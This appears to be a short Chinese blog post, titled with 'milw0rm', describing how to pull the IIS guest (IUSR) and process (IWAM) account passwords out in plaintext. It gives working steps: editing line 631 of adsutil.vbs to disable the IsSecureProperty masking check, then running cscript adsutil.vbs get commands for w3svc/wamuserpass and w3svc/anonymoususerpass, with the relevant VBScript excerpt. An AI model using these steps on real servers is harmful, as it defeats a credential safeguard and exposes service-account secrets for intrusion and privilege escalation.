milw0rm简单获取IIS来宾帐户(IUSR_XXX)和进程启动帐户(IWAM_XXX)密码
以前曾写过一篇博文《重置IIS来宾帐户(IUSR_XXX)和进程启动帐户(IWAM_XXX)密码》,主要用作在不小心修改了IIS里面的相关账户的情况。今天逛Bin牛(aspxspy作者)的Blog的时候,突然注意到他有一篇比较早的日志提到IIS的用户名和密码貌似是明文保存的,但是并没有说怎么找出明文密码。 不过他的几句话突然让我想到了我之前写的重置IIS密码的博文,设置IIS密码用的是cscript.exe adsutil.vbs set xxxxxx,有set多数情况下也会有get,一查用法,还真有,就小小读了下adsutil.vbs的代码,毕竟vbs是明文脚本,所以还是比较容易的找到方法了。 很简单: C:\Inetpub\AdminScripts\adsutil.vbs的631行的True改成False cscript.exe adsutil.vbs get w3svc/wamuserpass 代码如下 =================================================================== If (UCase(IIsSchemaObject.Syntax) = "STRING") Then ElseIf (UCase(IIsSchemaObject.Syntax) = "BINARY") Then =================================================================== 无图无真相(这句是引用的o(∩_∩)o...)
然后执行
cscript.exe adsutil.vbs get w3svc/anonymoususerpass
If (IsSecureProperty(ObjectParameter,MachineName) = False) Then '就是修改的这里,631行
ValueDisplay = ValueDisplay & """" & "**********" & """"
Else
ValueDisplay = ValueDisplay & """" & ValueList & """"
End If
